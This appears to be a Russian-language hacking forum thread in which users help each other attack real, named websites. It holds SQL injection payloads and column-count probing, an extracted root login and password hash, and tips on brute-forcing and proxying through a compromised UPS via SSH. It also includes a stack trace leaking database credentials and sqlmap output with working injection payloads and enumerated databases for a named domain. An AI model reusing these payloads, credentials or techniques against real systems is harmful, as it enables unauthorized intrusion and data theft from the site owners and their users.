и еще вопрос что с этим делать, хех No se puede ejecutar el query, error: XPATH syntax error: ':root:*4F23645A18ABD4FACEB00C9BC'[/QUOTE] Это логин и пароль.Даже имя root само за себя говорит . Как я понял ты через extractvalue вывоил?Там выводи в 31 символ наскоко я помню. А hash на MySQL 5 в 40 символов .
http://dev.web3.6893-2.whserv.de/index.php?id=-347 . Как обойти TYPO3?Тут версия 6.2.25 ------------------------------------------------------------ Подключился через SH к айпи сервера . Как curl закачать ?
Пробуйте брутеть по словарикам, грубым перебором, тема https://forum.antichat.ru/threads/218185/ - Софт для брута или чекайте на паблик сервисах, на наличие уже сбрученых паролей
Чем можно заменить(обойти) запятую при запросе ( UNION SELECT 1,2,3.... ) на сервере код: Code: $cookie=explode(',', $cookie);
Есть доступ к модему в сети A. В сети A есть SQL-сервер, который подключения с чужих IP не принимает. Модель модема в сети A - APC7932. Возможно ли поднять прокси/etc. на модеме, чтобы подключиться к базе?
Нашел на сайте SQL Injection: http://site.ru/search/?num=13750-01a' с такой ошибкой: Database error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1 но не могу определить количество столбцов. Через GROUP BY определить никак не получается. Делал так: http://site.ru/search/?num=13750-01a' GROUP BY 2 -- Database error: Unknown column '2' in 'group statement' если выводится такая ошибка, значит количество столбцов меньше 2, что странно. Естественно далее делаю так: http://site.ru/search/?num=13750-01a' GROUP BY 1 -- Database error: Can't group on 'cnt' что за ошибка такая? Гугл не помог. А вот ORDER BY работает немного по другому: http://site.ru/search/?num=13750-01a' ORDER BY 2 -- Database error: Unknown column '2' in 'order clause' тут все как и в первом случае. А если сделать так: http://site.ru/search/?num=13750-01a' ORDER BY 1 -- то никаких ошибок нет и все отображается нормально, в отличии от первого варианта с GROUP BY. И чтобы окончательно убедиться делал так: http://site.ru/search/?num=13750-01a' UNION SELECT 1 -- Database error: The used SELECT statements have a different number of columns причем пробовал указывать в UNION SELECT несколько столбцов, вплоть до 10, но ошибка не меняется. В общем, требуется помощь.
APC7932 - гугл выдает что это ИБП стоечный. Если и вправду ИБП, то посмотри, можно ли там включить доступ по SSH. Если можно, то законекться к нему с параметром -D <socksport>
Включил SSH, вырубился Telnet. SSH тоже не работает. Прогуглив узнал, что прошивка у этих моделей бажная. Так что все, кто встретят такие модели - поосторожней. Все равно спасибо!
http://sirus.su/in.php Что можно извлечь полезного ? sirus.su?robots.txt?file=config.php можно ли так прочитать данный файл, где то я видел видео на эту тему.
Имеется сайт site.ru/ajax/Areas/Product/ Если в cookies поставить ' в timezone, то выдает следующее: Spoiler: Ответ HTTP 500: Code: Exception Object ( [message:protected] => DateTimeZone::__construct(): Unknown or bad timezone (') [string:Exception:private] => [code:protected] => 0 [file:protected] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php [line:protected] => 164 [trace:Exception:private] => Array ( [0] => Array ( [file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php [line] => 164 [function] => __construct [class] => DateTimeZone [type] => -> [args] => Array ( [0] => ' ) ) [1] => Array ( [file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php [line] => 141 [function] => checkConnect [class] => MYSQL_DB [type] => -> [args] => Array ( ) ) [2] => Array ( [file] => /var/www/site/data/releases/sources/3.4.40/oop/MYSQL_DB.class.php [line] => 74 [function] => __construct [class] => MYSQL_DB [type] => -> [args] => Array ( [0] => site_work [1] => 01cNWgm3qbNeRWn6uHMUzOPI3CRVJZJ [2] => satom [3] => 127.0.0.1 [4] => 3307 ) ) [3] => Array ( [file] => /var/www/site/data/releases/sources/3.4.40/model/DefaultModel.class.php [line] => 75 [function] => DB [class] => MYSQL_DB [type] => :: [args] => Array ( ) ) [4] => Array ( [file] => /var/www/site/data/releases/sources/3.4.40/model/MailQueueModel.class.php [line] => 22 [function] => __construct [class] => DefaultModel [type] => -> [args] => Array ( [0] => mail_queue ) ) [5] => Array ( [file] => /var/www/site/data/releases/sources/3.4.40/oop/mail/QueueMailer.class.php [line] => 39 [function] => __construct [class] => MailQueueModel [type] => -> [args] => Array ( ) ) [6] => Array ( [file] => /var/www/site/data/releases/sources/3.4.40/oop/SendMail.class.php [line] => 56 [function] => send [class] => QueueMailer [type] => -> [args] => Array ( [0] => [email protected] [1] => Timezone Error [2] => Здесь может быть sql-injection или это просто вывод ошибки такой?
Как подобрать если не выводит кол-во? Code: http://www.premium-network.ru/index.php?id=-tariffs_internet%27+order+by+100+--+
Попробуй другой URL)) Code: http://www.premium-network.ru/index.php?id=add&used=faq&s=3 Spoiler: подсказка Code: --- Parameter: s (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=add&used=faq&s=3' AND 9304=9304 AND 'HJyF'='HJyF Type: error-based Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED) Payload: id=add&used=faq&s=3' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176706a71,(SELECT (ELT(3147=3147,1))),0x7171786271,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'xSeN'='xSeN Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id=add&used=faq&s=3' AND SLEEP(5) AND 'PmOg'='PmOg --- web server operating system: FreeBSD web application technology: PHP 5.4.26, Apache 2.2.27 back-end DBMS: MySQL >= 5.5 banner: '5.5.37' current user: 'forumpt@localhost' current database: 'new_premium' current user is DBA: False database management system users [1]: [*] 'forumpt'@'localhost' available databases [3]: [*] forumpt [*] information_schema [*] new_premium
